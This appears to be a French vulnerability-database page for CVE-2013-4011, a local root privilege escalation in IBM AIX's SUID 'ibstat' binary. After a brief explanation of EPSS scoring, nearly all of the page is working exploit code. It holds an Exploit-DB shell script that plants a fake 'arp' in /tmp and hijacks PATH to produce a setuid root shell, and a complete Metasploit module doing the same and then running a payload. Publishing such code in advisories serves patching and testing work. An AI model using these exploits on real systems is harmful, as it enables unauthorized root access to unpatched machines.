CVE-2013-4011 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

# Exploit-DB Note: Screenshot provided by exploit author # #!/bin/sh # Exploit Title: IBM AIX 6.1 / 7.1 local root privilege escalation # Date: 2013-09-24 # Exploit Author: Kristian Erik Hermansen <kristian.hermansen@gmail.com> # Vendor Homepage: http://www.ibm.com # Software Link: http://www-03.ibm.com/systems/power/software/aix/about.html # Version: IBM AIX 6.1 and 7.1, and VIOS 2.2.2.2-FP-26 SP-02 # Tested on: IBM AIX 6.1 # CVE: CVE-2013-4011 echo ' mm mmmmm m m ## # # # # # # ## #mm# # m""m # # mm#mm m" "m ' echo "[*] AIX root privilege escalation" echo "[*] Kristian Erik Hermansen" echo "[*] https://linkedin.com/in/kristianhermansen" echo " +++++?????????????~.:,.:+???????????++++ +++++???????????+...:.,.,.=??????????+++ +++???????????~.,:~=~:::..,.~?????????++ +++???????????:,~==++++==~,,.?????????++ +++???????????,:=+++++++=~:,,~????????++ ++++?????????+,~~=++++++=~:,,:????????++ +++++????????~,~===~=+~,,::,:+???????+++ ++++++???????=~===++~~~+,,~::???????++++ ++++++++?????=~=+++~~~:++=~:~+???+++++++ +++++++++????~~=+++~+=~===~~:+??++++++++ +++++++++?????~~=====~~==~:,:?++++++++++ ++++++++++????+~==:::::=~:,+??++++++++++ ++++++++++?????:~~=~~~~~::,??+++++++++++ ++++++++++?????=~:~===~,,,????++++++++++ ++++++++++???+:==~:,,.:~~..+??++++++++++ +++++++++++....==+===~~=~,...=?+++++++++ ++++++++,........~=====..........+++++++ +++++................................++= =+:....................................= " TMPDIR=/tmp TAINT=${TMPDIR}/arp RSHELL=${TMPDIR}/r00t-sh cat > ${TAINT} <<-! #!/bin/sh cp /bin/sh ${RSHELL} chown root ${RSHELL} chmod 4555 ${RSHELL} ! chmod 755 ${TAINT} PATH=.:${PATH} export PATH cd ${TMPDIR} /usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null if [ -e ${RSHELL} ]; then echo "[+] Access granted. Don't be evil..." ${RSHELL} else echo "[-] Exploit failed. Try some 0day instead..." fi

## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class Metasploit4 < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, "Name" => "ibstat $PATH Privilege Escalation", "Description" => %q{ This module exploits the trusted $PATH environment variable of the SUID binary "ibstat". }, "Author" => [ "Kristian Erik Hermansen", #original author "Sagi Shahar <sagi.shahar[at]mwrinfosecurity.com>", #Metasploit module "Kostas Lintovois <kostas.lintovois[at]mwrinfosecurity.com>" #Metasploit module ], "References" => [ ["CVE", "2013-4011"], ["OSVDB", "95420"], ["BID", "61287"], ["URL", "http://www-01.ibm.com/support/docview.wss?uid=isg1IV43827"], ["URL", "http://www-01.ibm.com/support/docview.wss?uid=isg1IV43756"] ], "Platform" => ["unix"], "Arch" => ARCH_CMD, "Payload" => { "Compat" => { "PayloadType" => "cmd", "RequiredCmd" => "perl" } }, "Targets" => [ ["IBM AIX Version 6.1", {}], ["IBM AIX Version 7.1", {}] ], "DefaultTarget" => 1, "DisclosureDate" => "Sep 24 2013" )) register_options([ OptString.new("WritableDir", [true, "A directory where we can write files", "/tmp"]) ], self.class) end def check find_output = cmd_exec("find /usr/sbin/ -name ibstat -perm -u=s -user root 2>/dev/null") if find_output.include?("ibstat") return Exploit::CheckCode::Vulnerable end Exploit::CheckCode::Safe end def exploit if check == Exploit::CheckCode::Safe fail_with(Failure::NotVulnerable, "Target is not vulnerable.") else print_good("Target is vulnerable.") end root_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}" arp_file = "#{datastore["WritableDir"]}/arp" c_file = %Q^#include <stdio.h> int main() { setreuid(0,0); setregid(0,0); execve("/bin/sh",NULL,NULL); return 0; } ^ arp = %Q^#!/bin/sh chown root #{root_file} chmod 4555 #{root_file} ^ if gcc_installed? print_status("Dropping file #{root_file}.c...") write_file("#{root_file}.c", c_file) print_status("Compiling source...") cmd_exec("gcc -o #{root_file} #{root_file}.c") print_status("Compilation completed") register_file_for_cleanup("#{root_file}.c") else cmd_exec("cp /bin/sh #{root_file}") end register_file_for_cleanup(root_file) print_status("Writing custom arp file...") write_file(arp_file,arp) register_file_for_cleanup(arp_file) cmd_exec("chmod 0555 #{arp_file}") print_status("Custom arp file written") print_status("Updating $PATH environment variable...") path_env = cmd_exec("echo $PATH") cmd_exec("PATH=#{datastore["WritableDir"]}:$PATH") cmd_exec("export PATH") print_status("Triggering vulnerablity...") cmd_exec("/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null") # The $PATH variable must be restored before the payload is executed # in cases where an euid root shell was gained print_status("Restoring $PATH environment variable...") cmd_exec("PATH=#{path_env}") cmd_exec("export PATH") cmd_exec(root_file) print_status("Checking root privileges...") if is_root? print_status("Executing payload...") cmd_exec(payload.encoded) end end def gcc_installed? print_status("Checking if gcc exists...") gcc_whereis_output = cmd_exec("whereis -b gcc") if gcc_whereis_output.include?("/") print_good("gcc found!") return true end print_status("gcc not found. Using /bin/sh from local system") false end def is_root? id_output = cmd_exec("id") if id_output.include?("euid=0(root)") print_good("Got root! (euid)") return true end if id_output.include?("uid=0(root)") print_good("Got root!") return true end print_status("Exploit failed") false end end